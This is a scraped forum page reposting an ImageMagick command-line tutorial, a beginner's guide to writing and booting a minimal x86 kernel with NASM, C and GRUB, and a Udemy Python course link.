orchid.jpg JPEG 1600x1200 1600x1200+0+0 8-bit DirectClass 426KB 0.000u 0:00.000 Resizing images Images can be resized using convert. Let's resize our 1600x1200 JPEG image into a 320x240 thumbnail: julian@ce:~/images/tmp$ convert -resize 320x240 orchid.jpg orchid_thumb.jpg JPEG thumbnails from a directory of numerous TIFF images Here thumbnails are made from a folder of numerous large TIFF images. It's often desirable to preserve aspect ratio in thumbnails. We can do this with convert -resize without needing to know the image dimensions or aspect ratio by only passing the width argument (ommitting height). In the same command we use sed to replace "tiff" with "jpeg" (rather than adding "jpeg" to the end of the file name). This makes for a saner filename while simultaneously telling convert to convert the image type. The end result are 320px wide thumbnail JPEGs for every TIFF image, prepended with "320_" and written out to a newly created thumbs directory: julian@ce:~/images/TIFF$ mkdir thumbs julian@ce:~/images/TIFF$ for f in $(ls *.tiff); do convert -resize 320 $f \ thumbs/320_$(echo $f | sed 's/tiff/jpeg/'); done julian@ce:~/images/TIFF$ ls -l thumbs total 77072 -rw-r--r-- 1 julian julian 14272 Apr 19 23:13 320_00001.jpeg -rw-r--r-- 1 julian julian 38283 Apr 19 23:13 320_00002.jpeg -rw-r--r-- 1 julian julian 49367 Apr 19 23:13 320_00003.jpeg -rw-r--r-- 1 julian julian 49167 Apr 19 23:13 320_00004.jpeg -rw-r--r-- 1 julian julian 48813 Apr 19 23:13 320_00005.jpeg ... NOTE: The "\" symbol above is used to line-break the command so that it fits while still functioning in the space available above. If you're typing it out in a shell in a terminal on your machine, either hit ENTER after that character then copy in the remaining code or omit it altogether, leaving just a space between arguments. Making an animated GIF from a directory of JPEG images Here we'll take a directory of JPEG images (Photos) and in one line produce a 640 pixel wide, looping, animated GIF, with a 50 millisecond delay between images: julian@ce:~/tmp$ convert -resize 640 -delay 50 Photos/*.jpeg -loop 0 animation.gif Rotate an image For demonstration purposes we'll now work with a large image called datacenter.jpeg, which, let's assume, was rotated wrongly when it came off the camera attached to the little computer on our quadcopter. julian@ce:~/tmp$ identify datacenter.jpeg datacenter.jpg JPEG 1280x1920 1280x1920+0+0 8-bit DirectClass 1.139MB 0.000u 0:00.000 Rotating images is simple. Here we rotate it 90 degrees anti-clockwise to the portrait orientation, over-writing the original: julian@ce:~/tmp$ convert -rotate -90 datacenter.jpeg datacenter.jpeg We can use display from the ImageMagick suite to view the result: julian@ce:~/tmp$ display datacenter.jpeg Cropping Let's now crop the image back so we have a focus on a particular region of the image. We'll crop it down to an image cropped.jpeg 640x480 pixels in size starting 600 pixels in from X and starting 550 pixels from Y: julian@ce:~/tmp$ convert -crop 640x480+600+550 datacenter.jpeg cropped.jpeg Blurring Here we blur our cropped image with a 10x10 pixel blur routine: julian@ce:~/tmp$ convert -blur 10x10 cropped.jpeg blurred.jpeg Colour inversion We can invert the colour space of this image using the option 'negate': julian@ce:~/tmp$ convert -negate cropped.jpeg inverted.jpeg Enhancing/de-noising Our cropped image has a little noise, which we can clean up using the -enhance option: julian@ce:~/tmp$ convert -enhance cropped.jpeg enhanced.jpeg Increasing contrast White balance / contrast can be automatically adjusted: julian@ce:~/tmp$ convert -contrast enhanced.jpeg contrast.jpeg Annotating Let's annotate our image with some text so we know what we're looking at. We can set the -gravity (where the annotation should occur), a background colour (from a built-in palette) and use -splice to add extra space to the image, making room for our label, ensuring we don't write over existing pixels. Here we request 18 pixels of splice only in the Y direction. The -annotate option takes an X and Y argument, in our case we want to nudge the text down 4 pixels. julian@ce:~/tmp$ convert -gravity North -background Orange -splice 0x18 -annotate +0+4 "Facebook datacenter, 640x480 zoom @ X=600, Y=550" contrast.jpeg final.jpeg Further reading These are just a few of the possibilities available with convert and ImageMagick as a whole. To get a sense of what's possible, type: man convert Here is a list of available options ?adaptive?blur • ?adaptive?resize • ?adaptive?sharpen • ?adjoin • ?affine • ?alpha • ?annotate • ?antialias • ?append • ?attenuate • ?authenticate • ?auto?gamma • ?auto?level • ?auto?orient • ?backdrop • ?background • ?bench • ?bias • ?black?point?compensation • ?black?threshold • ?blend • ?blue?primary • ?blue?shift • ?blur • ?border • ?bordercolor • ?borderwidth • ?brightness?contrast • ?cache • ?canny • ?caption • ?cdl • ?channel • ?charcoal • ?chop • ?clamp • ?clip • ?clip?mask • ?clip?path • ?clone • ?clut • ?coalesce • ?colorize • ?colormap • ?color?matrix • ?colors • ?colorspace • ?combine • ?comment • ?compare • ?complex • ?compose • ?composite • ?compress • ?contrast • ?contrast?stretch • ?convolve • ?crop • ?cycle • ?debug • ?decipher • ?deconstruct • ?define • ?delay • ?delete • ?density • ?depth • ?descend • ?deskew • ?despeckle • ?direction • ?displace • ?display • ?dispose • ?dissimilarity?threshold • ?dissolve • ?distort • ?distribute?cache • ?dither • ?draw • ?duplicate • ?edge • ?emboss • ?encipher • ?encoding • ?endian • ?enhance • ?equalize • ?evaluate • ?evaluate?sequence • ?extent • ?extract • ?family • ?features • ?fft • ?fill • ?filter • ?flatten • ?flip • ?floodfill • ?flop • ?font • ?foreground • ?format • ?format[identify] • ?frame • ?frame[import] • ?function • ?fuzz • ?fx • ?gamma • ?gaussian?blur • ?geometry • ?gravity • ?grayscale • ?green?primary • ?hald?clut • ?help • ?highlight?color • ?hough?lines • ?iconGeometry • ?iconic • ?identify • ?ift • ?immutable • ?implode • ?insert • ?intensity • ?intent • ?interlace • ?interpolate • ?interline?spacing • ?interword?spacing • ?kerning • ?label • ?lat • ?layers • ?level • ?level?colors • ?limit • ?linear?stretch • ?linewidth • ?liquid?rescale • ?list • ?log • ?loop • ?lowlight?color • ?magnify • ?map • ?map[stream] • ?mask • ?mattecolor • ?median • ?metric • ?mode • ?modulate • ?moments • ?monitor • ?monochrome • ?morph • ?morphology • ?mosaic • ?motion?blur • ?name • ?negate • ?noise • ?normalize • ?opaque • ?ordered?dither • ?orient • ?page • ?paint • ?path • ?pause[animate] • ?pause[import] • ?perceptible • ?ping • ?pointsize • ?polaroid • ?poly • ?posterize • ?precision • ?preview • ?print • ?process • ?profile • ?quality • ?quantize • ?quiet • ?radial?blur • ?raise • ?random?threshold • ?red?primary • ?regard?warnings • ?region • ?remap • ?remote • ?render • ?repage • ?resample • ?resize • ?respect?parentheses • ?reverse • ?roll • ?rotate • ?sample • ?sampling?factor • ?scale • ?scene • ?screen • ?seed • ?segment • ?selective?blur • ?separate • ?sepia?tone • ?set • ?shade • ?shadow • ?shared?memory • ?sharpen • ?shave • ?shear • ?sigmoidal?contrast • ?silent • ?similarity?threshold • ?size • ?sketch • ?smush • ?snaps • ?solarize • ?sparse?color • ?splice • ?spread • ?statistic • ?stegano • ?stereo • ?stretch • ?strip • ?stroke • ?strokewidth • ?style • ?subimage?search • ?swap • ?swirl • ?synchronize • ?taint • ?text?font • ?texture • ?threshold • ?thumbnail • ?tile • ?tile?offset • ?tint • ?title • ?transform • ?transparent • ?transparent?color • ?transpose • ?transverse • ?treedepth • ?trim • ?type • ?undercolor • ?unique?colors • ?units • ?unsharp • ?update • ?verbose • ?version • ?view • ?vignette • ?virtual?pixel • ?visual • ?watermark • ?wave • ?weight • ?white?point • ?white?threshold • ?window • ?window?group • ?write You can also look here, at the ImageMagick project page and also at this impressive collection of scripts that abstract over ImageMagick utilities. Sursa: HOWTO: Command line manipulation of images - Critical Engineering Discourse
  24. Hello World, Let us write a simple kernel which could be loaded with the GRUB bootloader on an x86 system. This kernel will display a message on the screen and then hang. How does an x86 machine boot Before we think about writing a kernel, let’s see how the machine boots up and transfers control to the kernel: The x86 CPU is hardwired to begin execution at the physical address [0xFFFFFFF0]. It is in fact, the last 16 bytes of the 32-bit address space. This address just contains a jump instruction to the address in memory where BIOS has copied itself. Thus, the BIOS code starts its execution. BIOS first searches for a bootable device in the configured boot device order. It checks for a certain magic number to determine if the device is bootable or not. Once the BIOS has found a bootable device, it copies the contents of the device’s first sector into RAM starting from physical address [0x7c00]; and then jumps into the address and executes the code just loaded. This code is called the bootloader. The bootloader then loads the kernel at the physical address [0x100000]. The address [0x100000] is used as the start-address for all big kernels on x86 machines. What all do we need? * An x86 computer (of course) * Linux * NASM assembler * gcc * ld (GNU Linker) * grub Source Code Source code is available at my Github repository - mkernel The entry point using assembly We like to write everything in C, but we cannot avoid a little bit of assembly. We will write a small file in x86 assembly-language that serves as the starting point for our kernel. All our assembly file will do is invoke an external function which we will write in C, and then halt the program flow. How do we make sure that this assembly code will serve as the starting point of the kernel? We will use a linker script that links the object files to produce the final kernel executable. (more explained later) In this linker script, we will explicitly specify that we want our binary to be loaded at the address [0x100000]. This address, as I have said earlier, is where the kernel is expected to be. Thus, the bootloader will take care of firing the kernel’s entry point. Here’s the assembly code: ;;kernel.asm bits 32 ;nasm directive - 32 bit section .text global start extern kmain ;kmain is defined in the c file start: cli ;block interrupts call kmain hlt ;halt the CPU The first instruction bits 32 is not an x86 assembly instruction. It’s a directive to the NASM assembler that specifies it should generate code to run on a processor operating in 32 bit mode. It is not mandatorily required in our example, however is included here as it’s good practice to be explicit. The second line begins the text section (aka code section). This is where we put all our code. global is another NASM directive to set symbols from source code as global. By doing so, the linker knows where the symbol start is; which happens to be our entry point. kmain is our function that will be defined in our kernel.c file. extern declares that the function is declared elsewhere. Then, we have the start function, which calls the kmain function and halts the CPU using the hlt instruction. Interrupts can awake the CPU from an hlt instruction. So we disable interrupts beforehand using cli instruction. cli is short for clear-interrupts. The kernel in C In kernel.asm, we made a call to the function kmain(). So our C code will start executing at kmain(): /* * kernel.c */ void kmain(void) { char *str = "my first kernel"; char *vidptr = (char*)0xb8000; //video mem begins here. unsigned int i = 0; unsigned int j = 0; //clear all while(j < 80 * 25 * 2) { //blank character vidptr[j] = ' '; //attribute-byte: light grey on black screen vidptr[j+1] = 0x07; j = j + 2; } j = 0; while(str[j] != '\0') { vidptr[i] = str[j]; vidptr[i+1] = 0x07; ++j; i = i + 2; } return; } All our kernel will do is clear the screen and write to it the string “my first kernel”. First we make a pointer vidptr that points to the address [0xb8000]. This address is the start of video memory in protected mode. The screen’s text memory is simply a chunk of memory in our address space. The memory mapped input/output for the screen starts at [0xb8000] and supports 25 lines, each line contain 80 ascii characters. Each character element in this text memory is represented by 16 bits (2 bytes), rather than 8 bits (1 byte) which we are used to. The first byte should have the representation of the character as in ASCII. The second byte is the attribute-byte. This describes the formatting of the character including attributes such as color. To print the character s in green color on black background, we will store the character s in the first byte of the video memory address and the value [0x02] in the second byte. 0 represents black background and 2 represents green foreground. Have a look at table below for different colors: 0 - Black, 1 - Blue, 2 - Green, 3 - Cyan, 4 - Red, 5 - Magenta, 6 - Brown, 7 - Light Grey, 8 - Dark Grey, 9 - Light Blue, 10/a - Light Green, 11/b - Light Cyan, 12/c - Light Red, 13/d - Light Magenta, 14/e - Light Brown, 15/f – White. In our kernel, we will use light grey character on a black background. So our attribute-byte must have the value [0x07]. In the first while loop, the program writes the blank character with [0x07] attribute all over the 80 columns of the 25 lines. This thus clears the screen. In the second while loop, characters of the null terminated string “my first kernel” are written to the chunk of video memory with each character holding an attribute-byte of [0x07]. This should display the string on the screen. The linking part We will assemble kernel.asm with NASM to an object file; and then using GCC we will compile kernel.c to another object file. Now, our job is to get these objects linked to an executable bootable kernel. For that, we use an explicit linker script, which can be passed as an argument to ld (our linker). /* * link.ld */ OUTPUT_FORMAT(elf32-i386) ENTRY(start) SECTIONS { . = 0x100000; .text : { *(.text) } .data : { *(.data) } .bss : { *(.bss) } } First, we set the output format of our output executable to be 32 bit Executable and Linkable Format (ELF). ELF is the standard binary file format for Unix-like systems on x86 architecture. ENTRY takes one argument. It specifies the symbol name that should be the entry point of our executable. SECTIONS is the most important part for us. Here, we define the layout of our executable. We could specify how the different sections are to be merged and at what location each of these is to be placed. Within the braces that follow the SECTIONS statement, the period character (.) represents the location counter. The location counter is always initialized to [0x0] at beginning of the SECTIONS block. It can be modified by assigning a new value to it. Remember, earlier I told you that kernel’s code should start at the address [0x100000]. So, we set the location counter to [0x100000]. Have look at the next line .text : { *(.text) } The asterisk is a wildcard character that matches any file name. The expression *(.text) thus means all .text input sections from all input files. So, the linker merges all text sections of the object files to the executable’s text section, at the address stored in the location counter. Thus, the code section of our executable begins at [0x100000]. After the linker places the text output section, the value of the location counter will become 0x1000000 + the size of the text output section. Similarly, the data and bss sections are merged and placed at the then values of location-counter. Grub and Multiboot Now, we have all our files ready to build the kernel. But, since we like to boot our kernel with the GRUB bootloader, there is one step left. There is a standard for loading various x86 kernels using a boot loader; called as Multiboot specification. GRUB will only load our kernel if it complies with the Multiboot spec. According to the spec, the kernel must contain a header (known as Multiboot header) within its first 8 KiloBytes. Further, This Multiboot header must contain 3 fields that are 4 byte aligned namely: a magic field: containing the magic number [0x1BADB002], to identify the header. a flags field: We will not care about this field. We will simply set it to zero. a checksum field: the checksum field when added to the fields ‘magic’ and ‘flags’ must give zero. So our kernel.asm will become: ;;kernel.asm ;nasm directive - 32 bit bits 32 section .text ;multiboot spec align 4 dd 0x1BADB002 ;magic dd 0x00 ;flags dd - (0x1BADB002 + 0x00) ;checksum. m+f+c should be zero global start extern kmain ;kmain is defined in the c file start: cli ;block interrupts call kmain hlt ;halt the CPU The dd defines a double word of size 4 bytes. Building the kernel We will now create object files from kernel.asm and kernel.c and then link it using our linker script. nasm -f elf32 kernel.asm -o kasm.o will run the assembler to create the object file kasm.o in ELF-32 bit format. gcc -m32 -c kernel.c -o kc.o The ‘-c ’ option makes sure that after compiling, linking doesn’t implicitly happen. ld -m elf_i386 -T link.ld -o kernel kasm.o kc.o will run the linker with our linker script and generate the executable named kernel. Configure your grub and run your kernel GRUB requires your kernel to be of the name pattern kernel-<version>. So, rename the kernel. I renamed my kernel executable to kernel-701. Now place it in the /boot directory. You will require superuser privileges to do so. In your GRUB configuration file grub.cfg you should add an entry, something like: title myKernel root (hd0,0) kernel /boot/kernel-701 ro Don’t forget to remove the directive hiddenmenu if it exists. Reboot your computer, and you’ll get a list selection with the name of your kernel listed. Select it and you should see: That’s your kernel!! PS: * It’s always advisable to get yourself a virtual machine for all kinds of kernel hacking. * To run this on grub2 which is the default bootloader for newer distros, your config should look like this (Thanks to Rubén Laguna from comments for the config): menuentry 'kernel 7001' { set root='hd0,msdos1' multiboot /boot/kernel-7001 ro } * Also, if you want to run the kernel on the qemu emulator instead of booting with GRUB, you can do so by: qemu-system-i386 -kernel kernel Sursa: Kernel 101 – Let’s write a Kernel - Arjun Sreedharan
      • 2
      • Upvote
  25. Usr6

    Udemy

    Python basics with Project - Learn Python to think like a Programmer *Python is used by NASA for shuttle support. https://www.udemy.com/python-basics-with-project/?couponCode=PYTHON_LAUNCH
×
×
  • Create New...